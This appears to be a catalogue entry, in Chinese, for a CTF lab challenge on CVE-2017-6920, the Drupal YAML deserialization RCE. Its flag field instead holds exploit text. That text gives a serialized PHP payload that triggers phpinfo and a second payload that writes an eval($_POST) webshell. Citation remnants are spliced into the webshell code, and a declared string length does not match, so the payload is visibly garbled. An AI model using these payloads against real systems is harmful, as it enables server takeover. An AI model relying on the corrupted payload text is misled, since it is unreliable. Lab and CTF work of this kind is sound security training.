| ID: | 14748 |
|---|---|
| 标题: | CVE-2017-6920 |
| 描述: | Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal7.56之前的7.x版本和8.3.4之前的8.x版本中存在远程代码执行漏洞。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。 |
| 类型: | WEB |
| 网站: | 春秋云境 |
| 题目链接: | https://yunjing.ichunqiu.com/cvevip |
| 赛事: | 春秋云境 |
| 年度: | None |
| Flag值: | Drupal版本小于8.3.4时,可通过在后台配置导入处提交YAML反序列化Payload实现远程代码执行。典型的验证Payload为:!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}",导入后执行phpinfo函数即证明漏洞存在 1。在CTF题目中,常利用该反序列化链写入Webshell,例如使用自定义类:!php/object O:3:"log":2:{s:8:"filename";s:5:"1.php";s:7:"content";s:24:"<?php eval($_POST [1](@ref));?>";}。 |
| writeup: | https://www.cnblogs.com/J1eula/p/17691430.html |